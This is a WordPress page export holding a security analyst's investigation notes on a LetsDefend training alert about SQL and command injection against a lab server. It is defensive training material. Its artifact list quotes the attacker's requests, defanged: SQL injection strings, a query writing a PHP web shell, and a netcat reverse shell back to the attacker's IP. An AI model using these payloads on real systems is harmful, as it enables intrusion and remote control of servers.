{"id":1181,"date":"2026-07-07T01:14:01","date_gmt":"2026-07-07T01:14:01","guid":{"rendered":"https:\/\/victorcoil.tech\/?page_id=1181"},"modified":"2026-07-07T01:15:54","modified_gmt":"2026-07-07T01:15:54","slug":"analyst-note-sample-letsdefend-event-id-89","status":"publish","type":"page","link":"https:\/\/victorcoil.tech\/?page_id=1181","title":{"rendered":"Analyst Note Sample &#8211; LetsDefend Event ID 89"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Additional Info: The alert was done twice because LetsDefend reached out to conduct a walkthrough. You&#8217;ll find both investigation notes below.<br><br>Date of Investigation: Aug, 23, 2024, 06:30 AM<br>Alert Title: Multiple 500 Resp Codes<br>Time to investigate: 30 Minutes<br><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Retrospective Note:<br>This was before I had the template that included closure codes and the reasoning for choosing each code. On LetsDefend, you do input if it&#8217;s a true positive and why, but I was advised by a working professional to also include that in the notes. Aside from that, if I were to revisit this, I would include the queries run on the SIEM, in this instance, the &#8220;Log Management,&#8221; and list out the artifacts\/logs that I found with the timestamps included. As well as the actual command run by the threat actor, found in the Endpoint security modules terminal history. <br><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code># First Investigation\n\nAffected systems and users\nSRC IP:  101.32.223&#91;.]119\nDST IP: 172.16.20.6\nHostname: SQLServer\n\nSteps taken in the investigation\nInternal threat intelligence returned no data on the Source IP address. No vendors reported the IP as malicious, as per Virustotal. Community Comments report of a malicious past with this IP. Cisco Talos reports a poor reputation.\nLog Management shows artifacts of successful SQL and Command Injections, including one that was a reverse shell. Successful injection can be confirmed by reviewing the Endpoints Terminal History. \n\nActions taken\nThe host was contained. \n\nReferences\nhttps:&#47;&#47;www.virustotal.com\/gui\/ip-address\/101.32.223.119\/community\nhttps:\/\/www.talosintelligence.com\/reputation_center\/lookup?search=101.32.223.119\n\n--------------------------------------------------\n# 2nd Investigation (Redone for a video walkthrough)\n\nApr, 18, 2021, 01:00 PM \nAffected systems and users \nEndPoint IP: 172.16.20.6 \nSuspected Malicious IP: 101.32.223.119 \nHostname: SQLServer \n\nSteps taken in the investigation \n\nIP is being reported as non-malicious by vendors as per Virustotal, but has a history of abuse in AbuseIPDB and is brought up in the community tab in Virustotal for malicious activity. Internal Threat Intelligence returned no data on the IP. Can see outbound connections from the endpoint IP to the suspected malicious IP. Logs from the SIEM indicate that the malicious IP was able to create a file and execute commands. Code 200 was returned for the command execution requests. The endpoint security terminal history tab confirms that the commands executed by the threat actor were successfully run. Process history shows that Netcat was run to create a reverse shell to the malicious IP. \n\nActions taken: Endpoint Contained. \n\nReferences \nhttps:\/\/www.virustotal.com\/gui\/ip-address\/101.32.223.119\/detection \nhttps:\/\/www.abuseipdb.com\/check\/101.32.223.119 \nhttps:\/\/www.talosintelligence.com\/reputation_center\/lookup?search=101.32.223.119\n\n----------- (Artifacts below were separate from notes but input into case management)\n\nExtracted Artifacts:\n\nType Value\nIP Address: 101.32.223&#91;.]119\nRequested URL 1: hxxps&#91;:\/\/]172&#91;.]16.20.6\/userNumber=' OR '' = '\nRequested URL 2: hxxps&#91;:\/\/]172&#91;.]16&#91;.]20&#91;.]6\/userNumber=' union select 1, '&lt;?php system($_GET&#91;'cmd']); ?>' into outfile '\/var\/www\/html\/cmd&#91;.]php' #\nRequested URL 3: hxxps&#91;:\/\/]172&#91;.]16.20.6\/userNumber=-1 UNION SELECT 1 INTO @,@\nRequested URL 4: hxxps&#91;:\/\/]172&#91;.]16.20.6\/cmd&#91;.]php?cmd=whoami\nRequested URL 5: hxxps&#91;:\/\/]172&#91;.]16.20.6\/userNumber=1 AND (SELECT * FROM Users) = 1\nRequested URL 6: hxxps&#91;:\/\/]172&#91;.]16.20.6\/cmd&#91;.]php?cmd=id\nRequested URL 7: hxxps&#91;:\/\/]172&#91;.]16.20.6\/userNumber=AND true\nRequested URL 8: hxxps&#91;:\/\/]172&#91;.]16.20.6\/cmd&#91;.]php?cmd=nc 101&#91;.]32.223.119 1234 -e \/bin\/sh\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Additional Info: The alert was done twice because LetsDefend reached out to conduct a walkthrough. You&#8217;ll find both investigation notes below. Date of Investigation: Aug, 23, 2024, 06:30 AMAlert Title: Multiple 500 Resp CodesTime to investigate: 30 Minutes Retrospective Note:This was before I had the template that included closure codes and the reasoning for choosing each code. On LetsDefend, you do input if it&#8217;s a true positive and why, but I was advised by a working professional to also include that in the notes. Aside from that, if I were to revisit this, I would include the queries run on<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"footnotes":""},"class_list":["post-1181","page","type-page","status-publish","hentry"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 4.9.8 - aioseo.com -->\n\t<meta name=\"description\" content=\"Additional Info: The alert was done twice because LetsDefend reached out to conduct a walkthrough. You&#039;ll find both investigation notes below.Date of Investigation: Aug, 23, 2024, 06:30 AMAlert Title: Multiple 500 Resp CodesTime to investigate: 30 Minutes Retrospective Note:This was before I had the template that included closure codes and the reasoning for choosing each\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<link rel=\"canonical\" href=\"https:\/\/victorcoil.tech\/?page_id=1181\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 4.9.8\" \/>\n\t\t<meta property=\"og:locale\" content=\"en_US\" \/>\n\t\t<meta property=\"og:site_name\" content=\"Victor Coil | Security Operations &amp; Detection Engineering - Cybersecurity Projects\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"Analyst Note Sample \u2013 LetsDefend Event ID 89 - Victor Coil | Security Operations &amp; Detection Engineering\" \/>\n\t\t<meta property=\"og:description\" content=\"Additional Info: The alert was done twice because LetsDefend reached out to conduct a walkthrough. You&#039;ll find both investigation notes below.Date of Investigation: Aug, 23, 2024, 06:30 AMAlert Title: Multiple 500 Resp CodesTime to investigate: 30 Minutes Retrospective Note:This was before I had the template that included closure codes and the reasoning for choosing each\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/victorcoil.tech\/?page_id=1181\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2026-07-07T01:14:01+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2026-07-07T01:15:54+00:00\" \/>\n\t\t<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n\t\t<meta name=\"twitter:title\" content=\"Analyst Note Sample \u2013 LetsDefend Event ID 89 - Victor Coil | Security Operations &amp; Detection Engineering\" \/>\n\t\t<meta name=\"twitter:description\" content=\"Additional Info: The alert was done twice because LetsDefend reached out to conduct a walkthrough. You&#039;ll find both investigation notes below.Date of Investigation: Aug, 23, 2024, 06:30 AMAlert Title: Multiple 500 Resp CodesTime to investigate: 30 Minutes Retrospective Note:This was before I had the template that included closure codes and the reasoning for choosing each\" \/>\n\t\t<script type=\"application\/ld+json\" class=\"aioseo-schema\">\n\t\t\t{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/?page_id=1181#breadcrumblist\",\"itemListElement\":[{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/victorcoil.tech#listItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/victorcoil.tech\",\"nextItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/?page_id=1181#listItem\",\"name\":\"Analyst Note Sample &#8211; LetsDefend Event ID 89\"}},{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/?page_id=1181#listItem\",\"position\":2,\"name\":\"Analyst Note Sample &#8211; LetsDefend Event ID 89\",\"previousItem\":{\"@type\":\"ListItem\",\"@id\":\"https:\\\/\\\/victorcoil.tech#listItem\",\"name\":\"Home\"}}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/?page_id=1181#webpage\",\"url\":\"https:\\\/\\\/victorcoil.tech\\\/?page_id=1181\",\"name\":\"Analyst Note Sample \\u2013 LetsDefend Event ID 89 - Victor Coil | Security Operations & Detection Engineering\",\"description\":\"Additional Info: The alert was done twice because LetsDefend reached out to conduct a walkthrough. You'll find both investigation notes below.Date of Investigation: Aug, 23, 2024, 06:30 AMAlert Title: Multiple 500 Resp CodesTime to investigate: 30 Minutes Retrospective Note:This was before I had the template that included closure codes and the reasoning for choosing each\",\"inLanguage\":\"en-US\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/#website\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/?page_id=1181#breadcrumblist\"},\"datePublished\":\"2026-07-07T01:14:01+00:00\",\"dateModified\":\"2026-07-07T01:15:54+00:00\"},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/#website\",\"url\":\"https:\\\/\\\/victorcoil.tech\\\/\",\"name\":\"Victor Coil Portfolio\\\/Project Archive\",\"description\":\"Cybersecurity Projects\",\"inLanguage\":\"en-US\",\"publisher\":{\"@id\":\"https:\\\/\\\/victorcoil.tech\\\/#person\"}}]}\n\t\t<\/script>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"Analyst Note Sample \u2013 LetsDefend Event ID 89 - Victor Coil | Security Operations & Detection Engineering","description":"Additional Info: The alert was done twice because LetsDefend reached out to conduct a walkthrough. You'll find both investigation notes below.Date of Investigation: Aug, 23, 2024, 06:30 AMAlert Title: Multiple 500 Resp CodesTime to investigate: 30 Minutes Retrospective Note:This was before I had the template that included closure codes and the reasoning for choosing each","canonical_url":"https:\/\/victorcoil.tech\/?page_id=1181","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"BreadcrumbList","@id":"https:\/\/victorcoil.tech\/?page_id=1181#breadcrumblist","itemListElement":[{"@type":"ListItem","@id":"https:\/\/victorcoil.tech#listItem","position":1,"name":"Home","item":"https:\/\/victorcoil.tech","nextItem":{"@type":"ListItem","@id":"https:\/\/victorcoil.tech\/?page_id=1181#listItem","name":"Analyst Note Sample &#8211; LetsDefend Event ID 89"}},{"@type":"ListItem","@id":"https:\/\/victorcoil.tech\/?page_id=1181#listItem","position":2,"name":"Analyst Note Sample &#8211; LetsDefend Event ID 89","previousItem":{"@type":"ListItem","@id":"https:\/\/victorcoil.tech#listItem","name":"Home"}}]},{"@type":"WebPage","@id":"https:\/\/victorcoil.tech\/?page_id=1181#webpage","url":"https:\/\/victorcoil.tech\/?page_id=1181","name":"Analyst Note Sample \u2013 LetsDefend Event ID 89 - Victor Coil | Security Operations & Detection Engineering","description":"Additional Info: The alert was done twice because LetsDefend reached out to conduct a walkthrough. You'll find both investigation notes below.Date of Investigation: Aug, 23, 2024, 06:30 AMAlert Title: Multiple 500 Resp CodesTime to investigate: 30 Minutes Retrospective Note:This was before I had the template that included closure codes and the reasoning for choosing each","inLanguage":"en-US","isPartOf":{"@id":"https:\/\/victorcoil.tech\/#website"},"breadcrumb":{"@id":"https:\/\/victorcoil.tech\/?page_id=1181#breadcrumblist"},"datePublished":"2026-07-07T01:14:01+00:00","dateModified":"2026-07-07T01:15:54+00:00"},{"@type":"WebSite","@id":"https:\/\/victorcoil.tech\/#website","url":"https:\/\/victorcoil.tech\/","name":"Victor Coil Portfolio\/Project Archive","description":"Cybersecurity Projects","inLanguage":"en-US","publisher":{"@id":"https:\/\/victorcoil.tech\/#person"}}]},"og:locale":"en_US","og:site_name":"Victor Coil | Security Operations &amp; Detection Engineering - Cybersecurity Projects","og:type":"article","og:title":"Analyst Note Sample \u2013 LetsDefend Event ID 89 - Victor Coil | Security Operations &amp; Detection Engineering","og:description":"Additional Info: The alert was done twice because LetsDefend reached out to conduct a walkthrough. You'll find both investigation notes below.Date of Investigation: Aug, 23, 2024, 06:30 AMAlert Title: Multiple 500 Resp CodesTime to investigate: 30 Minutes Retrospective Note:This was before I had the template that included closure codes and the reasoning for choosing each","og:url":"https:\/\/victorcoil.tech\/?page_id=1181","article:published_time":"2026-07-07T01:14:01+00:00","article:modified_time":"2026-07-07T01:15:54+00:00","twitter:card":"summary_large_image","twitter:title":"Analyst Note Sample \u2013 LetsDefend Event ID 89 - Victor Coil | Security Operations &amp; Detection Engineering","twitter:description":"Additional Info: The alert was done twice because LetsDefend reached out to conduct a walkthrough. You'll find both investigation notes below.Date of Investigation: Aug, 23, 2024, 06:30 AMAlert Title: Multiple 500 Resp CodesTime to investigate: 30 Minutes Retrospective Note:This was before I had the template that included closure codes and the reasoning for choosing each"},"aioseo_meta_data":{"post_id":"1181","title":null,"description":null,"keywords":null,"keyphrases":{"focus":{"keyphrase":"","score":0,"analysis":{"keyphraseInTitle":{"score":0,"maxScore":9,"error":1}}},"additional":[]},"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":"","og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"WebPage","isEnabled":true},"graphs":[]},"schema_type":"default","schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":"-1","robots_max_videopreview":"-1","robots_max_imagepreview":"large","priority":null,"frequency":"default","local_seo":null,"breadcrumb_settings":null,"limit_modified_date":false,"ai":{"faqs":[],"keyPoints":[],"schemas":[],"titles":[],"descriptions":[],"socialPosts":{"email":[],"linkedin":[],"twitter":[],"facebook":[],"instagram":[]}},"created":"2026-07-06 02:43:07","updated":"2026-07-07 01:16:33","seo_analyzer_scan_date":null},"aioseo_breadcrumb":"<div class=\"aioseo-breadcrumbs\"><span class=\"aioseo-breadcrumb\">\n\t\t\t<a href=\"https:\/\/victorcoil.tech\" title=\"Home\">Home<\/a>\n\t\t<\/span><span class=\"aioseo-breadcrumb-separator\">&raquo;<\/span><span class=\"aioseo-breadcrumb\">\n\t\t\tAnalyst Note Sample \u2013 LetsDefend Event ID 89\n\t\t<\/span><\/div>","aioseo_breadcrumb_json":[{"label":"Home","link":"https:\/\/victorcoil.tech"},{"label":"Analyst Note Sample &#8211; LetsDefend Event ID 89","link":"https:\/\/victorcoil.tech\/?page_id=1181"}],"_links":{"self":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/1181","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1181"}],"version-history":[{"count":4,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/1181\/revisions"}],"predecessor-version":[{"id":1196,"href":"https:\/\/victorcoil.tech\/index.php?rest_route=\/wp\/v2\/pages\/1181\/revisions\/1196"}],"wp:attachment":[{"href":"https:\/\/victorcoil.tech\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1181"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}